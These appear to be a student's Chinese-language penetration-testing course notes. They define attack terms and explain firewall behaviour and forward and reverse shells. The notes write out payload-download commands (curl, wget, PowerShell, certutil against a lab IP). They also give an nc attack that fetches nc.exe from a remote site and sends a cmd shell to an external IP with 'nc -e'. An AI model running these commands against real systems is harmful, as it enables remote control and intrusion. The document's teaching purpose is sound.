22版学习日志-基础

渗透测试专业术语

POC+EXP+Payload+Shellcode

POC 全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 (漏洞验证)
EXP 全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 (漏洞利用★)
Payload 中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 (代码执行)
Shellcode 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。 (权限通道)

后门/WebShell,木马/病毒,反弹,回显,跳板,黑白盒测试,暴力破解,撞库,ATT&CK等

webshell :网站后门的专称
木马 :控制,实行操作。
病毒 :破坏性质。
反弹 :权限反弹出到其他地方进行控制。例如弹出root用户权限,在别的地方利用这个权限读取后台文件等等。
跳板 :中介作用,在别人黑西工大的时候就是用到了跳板。例如A想访问C,不能直接访问,那么久接触B,通过B访问C。此时的B就是中介。
黑白盒测试 : 黑盒没有源代码,不知道目标的某些情况。白盒测试是知道目标源代码和目标情况的,譬如网络公开的源代码。
社会工程学 : 惯性使用生日或者个人信息等设置弱密码。信任问题等。例如个人电话号码,生日等,攻击者可以利用这些信息伪造一个字典去进行爆破。社工库是某些平台信息泄露后收集起来的数据库,里面有很多个人信息。
暴力破解 : 使用弱密码或者弱账号对登录网站进行爆破。
撞库 :

通过社工库获取相关人员的信息,在某些平台上去尝试碰撞,看他有没有账户登录或注销什么的,最终通过一个号拿到其他号等。例如某人个人服务器绑定在某邮箱上,刚好你撞上去了,通过邮箱修改了账号服务器的归属,相当于直接取人家网站的后台了。
撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户
很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。
ATTC&CK : 很多专业名词都在这里。一个比较重要的专有名词网站。点我前往

棱角社区
渗透测试常用术语

操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机
2、Windows&Linux常见命令
3、文件权限&服务权限&用户权限等 - 权限受限会影响到脚本、文件等的获取★★

用户权限与用户组权限管理 > 影响是一个人还是一群人
当前用户权限不足以完成你的目的 – 提权(数据库提权)
Windows权限优先级:优先拒绝

4、系统用户&用户组&服务用户等分类

按照组对用户进行管理,可以批量授权。

5、自带防火墙出站&入站规则策略协议

防火墙:存储入站和出站的相关 协议 ,默认支持网站等部分协议
类别:Windows自带防火墙,Linux防火墙iptables,WAF(web防火墙,比如安全狗)
特征:入站严苛,出站松散。
主要影响方面:内网测试涉及协议较多,影响较大(真正意义上的阻止);外网渗透测试一般影响不大。

反弹Shell命令-解决数据回显&解决数据通讯

文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
具体在棱角社区。

网站:192.168.232.193:80
网站上的文件:PhpStorm-2023.1.exe
存储到本地并且重命名:php.exe

Linux
表示的是从 192.168.232.193:80的地方下载PhpStorm-2023.1.exe到本地,并且以php.exe的文件名保存
curl http://192.168.232.193:80/PhpStorm-2023.1.exe -o php.exe
wget http://192.168.232.193:80/PhpStorm-2023.1.exe -O php.exe


Windows
powershell.exe -Command "Invoke-WebRequest -Uri http://192.168.232.193:80/PhpStorm-2023.1.exe -OutFile php.exe"
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://192.168.232.193:80/PhpStorm-2023.1.exe',php.exe)"

certutil.exe -urlcache -split -f http://192.168.232.193:80/PhpStorm-2023.1.exe php.exe
copy \\192.168.232.193\files\PhpStorm-2023.1.exe php.exe

目的:为了显示、回显数据,达到命令交互的目的

交互式:交互式问答,不是直接返回结果。交互会卡在某一个环节,反弹shell能直接解决实时交互的问题。
useradd 用户名 passwd 用户名
测试Linux系统添加用户或修改密码命令交互回显问题–卡在输入密码那儿

防火墙绕过-正向连接&反向连接&内网服务器

1、内网:

内网 -> xiaodi8.com
xiaodi8.com !-> 内网
表示的含义是:内网可以连接到外网的“xiaodi8.com”网站,而xiaodi8.com却不能连接到内网。
内网连接外网网站是唯一的
外网访问内网主机不是唯一的
-- 举个例子,一个路由器上有一个公网IP,下面有N个内网主机。
-- 外网访问内网主机时,只能访问到一路由器的公网IP,而不能具体的连接到内网主机
-- 如果想要连接内网主机,除非内网主机主动弹出shell。

2、防火墙:

xiaodi8      <-> aliyun
xiaodi8防火墙 --> aliyun
aliyun !-> xiaodi8防火墙
路由器端口映射:外网转发数据包到路由器,路由器将数据包转发到内网指定主机。
防火墙策略:入站严密出站宽松->让内网服务器自己出来找你

防火墙限制某些端口:限制正向端口就用反向给出cmd,限制反向则用正向给出cmd。正反端口都被封禁就只能换端口了。
尽可能的让服务给出来。

瑞士军刀之内网反弹-nc攻击

文件下载&反弹Shell:

fofa直接搜索pikachu,会直接显示所有的pikachu靶场 – 现在可能查不到了,可以本地搭建一个

操作过程

nc:瑞士军刀,网络测评工具

使被攻击者主动到远程服务器下载nc工具
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe C://nc.exe

-- 受攻击方:
使用nc将cmd权限移动至对应的外网及端口
nc -e cmd 47.75.212.155 5566

-- 攻击方:
监听本地的端口5566
nc -lvvp 5566

思考

nc命令端口上的考虑
不要使用已经被占用的端口,例如80端口,会使命令失效